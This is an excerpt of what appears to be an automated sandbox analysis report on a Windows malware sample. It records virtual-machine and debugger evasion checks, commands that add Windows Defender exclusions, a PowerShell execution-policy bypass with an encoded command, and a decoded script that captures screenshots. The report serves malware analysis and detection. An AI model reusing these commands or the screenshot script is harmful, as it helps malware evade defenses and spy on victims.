              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 458 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -20291418481080494s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 5009 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep count: 924 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 3392 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 1563 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164Thread sleep count: 2375 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832Thread sleep count: 1358 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep count: 3355 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep count: 956 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA592F0 FindFirstFileExW,FindClose,0_2_00007FF78DA592F0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA583B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF78DA583B0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA718E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA592F0 FindFirstFileExW,FindClose,2_2_00007FF78DA592F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,70_2_00007FF6AA1A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E88E0 FindFirstFileExA,70_2_00007FF6AA1E88E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87EF490 GetSystemInfo,2_2_00007FF8A87EF490
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166661265.00000133FFD37000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"TEMEb
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B239000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397565293.000001F12B239000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extension
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166661265.00000133FFD37000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V{r
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2170342469.000001F12B288000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172233987.000001F12B234000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172692762.000001F12B23E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2401257690.000001F12B2E1000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172584244.000001F12B235000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2171311912.000001F12B23E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2170342469.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78DA6A684
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA734F0 GetProcessHeap,0_2_00007FF78DA734F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78DA6A684
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF78DA5C910
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78DA5D19C
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5D37C SetUnhandledExceptionFilter,0_2_00007FF78DA5D37C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00007FF6AA1E4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1DB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00007FF6AA1DB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1DA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,70_2_00007FF6AA1DA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1DB6D8 SetUnhandledExceptionFilter,70_2_00007FF6AA1DB6D8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
